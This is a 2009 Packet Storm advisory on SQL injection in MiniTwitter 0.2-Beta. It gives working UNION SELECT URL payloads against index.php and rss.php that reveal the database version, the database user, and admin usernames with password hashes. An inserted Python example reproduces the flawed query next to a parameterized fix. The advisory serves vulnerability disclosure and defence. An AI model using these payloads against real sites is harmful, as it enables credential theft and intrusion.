MiniTwitter 0.2-Beta SQL Injection

2009-05-03T00:00:00
ID PACKETSTORM:77209
Type packetstorm
Reporter YEnH4ckEr
Modified 2009-05-03T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------  
MULTIPLE SQL INJECTION VULNERABILITIES --MiniTwitter v0.2-Beta-->  
---------------------------------------------------------------------  
  
CMS INFORMATION:  
  
-->WEB: http://mt.bioscriptsdb.com/  
-->DOWNLOAD: http://sourceforge.net/projects/minitt/  
-->DEMO: http://www.bioscripts.net/minitwitter/index.php  
-->CATEGORY: Social Networking  
-->DESCRIPTION: Your business needs a private twitter. You can add...  
several twitter accounts and use this twitter as a backup of all...  
-->RELEASED: 2009-04-30  
  
CMS VULNERABILITY:  
  
-->TESTED ON: firefox 3  
-->DORK: "BioScripts"  
-->CATEGORY: SQL INJECTION (SQLi)  
-->AFFECT VERSION: <= 0.2 Beta  
-->Discovered Bug date: 2009-04-30   
-->Reported Bug date: 2009-04-30  
-->Fixed bug date: 2009-05-01  
-->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.  
-->EXTRA-COMMENT: Thanks to all of you for putting up with me! (I love you, little one!)  
  
  
  
##############################  
//////////////////////////////  
  
SQL INJECTION (SQLi):  
  
/////////////////////////////  
##############################  
  
  
  
<<<<---------++++++++++++++ Condition-1: magic_quotes_gpc=off +++++++++++++++++--------->>>>  
  
<<<<---------++++++++++++++++ Condition-2: Be a registered user +++++++++++++++++++--------->>>>  
  
  
  
This application is completely vulnerable to SQL injection.  
  
  
-----  
PoC:  
-----  
  
  
File: index.php Var: GET var 'user' -->  
  
  
http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+1,version()/*  
  
  
Return --> Database version.  
  
  
File: inc/rss.php Var: GET var 'user' -->  
  
  
http://[HOST]/[HOME_PATH]/rss.php?user=2%27+UNION+ALL+SELECT+user(),2/*  
  
  
Return --> Database user.  
  
  
---------  
EXPLOIT:  
---------  
  
  
http://[HOST]/[HOME_PATH]/index.php?user=2%27+UNION+ALL+SELECT+2,concat(nick,0x3A3A3A,password)+FROM+mt_users+WHERE+id_usr=1/*  
  
  
Return --> nick:::password(md5 hash)  
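Added example (not the advisory's or MiniTwitter's own code): a hypothetical reconstruction of the flawed lookup beside a parameterized version, run against a constructed SQLite database so the effect of binding the 'user' value instead of splicing it into the query can be checked. Only the mt_users table with id_usr, nick and password comes from the advisory; the mt_posts table, all rows, the function names and the SQLite rewrite of the payload (|| instead of concat/0x3A3A3A) are assumptions, and parameter binding removes the dependence on magic_quotes_gpc entirely.

```python
import sqlite3


def make_db():
    """Constructed sample database. Only mt_users/id_usr/nick/password come from
    the advisory; the second table and every row are made up for this example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mt_users (id_usr INTEGER PRIMARY KEY, nick TEXT, password TEXT)")
    db.execute("INSERT INTO mt_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
    db.execute("CREATE TABLE mt_posts (id_usr INTEGER, body TEXT)")
    db.executemany("INSERT INTO mt_posts VALUES (?, ?)", [(1, "first post"), (2, "second post")])
    return db


def posts_for_user_vulnerable(db, user):
    """Hypothetical reconstruction of the flawed pattern: the raw GET value is
    spliced into the SQL text, so a quote closes the literal and the remainder
    is parsed as SQL (this is what magic_quotes_gpc=off leaves unprotected)."""
    sql = "SELECT id_usr, body FROM mt_posts WHERE id_usr='%s'" % user
    return db.execute(sql).fetchall()


def posts_for_user_hardened(db, user):
    """Fixed version: enforce the expected type first, then bind the value as a
    query parameter so the database engine never interprets it as SQL."""
    try:
        uid = int(user)
    except (TypeError, ValueError):
        raise ValueError("user must be a numeric id") from None
    return db.execute("SELECT id_usr, body FROM mt_posts WHERE id_usr=?", (uid,)).fetchall()


# The advisory's payload rewritten in SQLite syntax (|| instead of concat/0x3A3A3A).
PAYLOAD = "2' UNION ALL SELECT 2, nick || ':::' || password FROM mt_users WHERE id_usr=1/*"


def leaks_credentials(rows):
    """True if any returned row carries a nick:::hash pair pulled from mt_users."""
    return any(isinstance(body, str) and ":::" in body for _, body in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", posts_for_user_vulnerable(db, PAYLOAD))
    try:
        posts_for_user_hardened(db, PAYLOAD)
    except ValueError as err:
        print("hardened rejected payload:", err)
```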
  
  
  
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  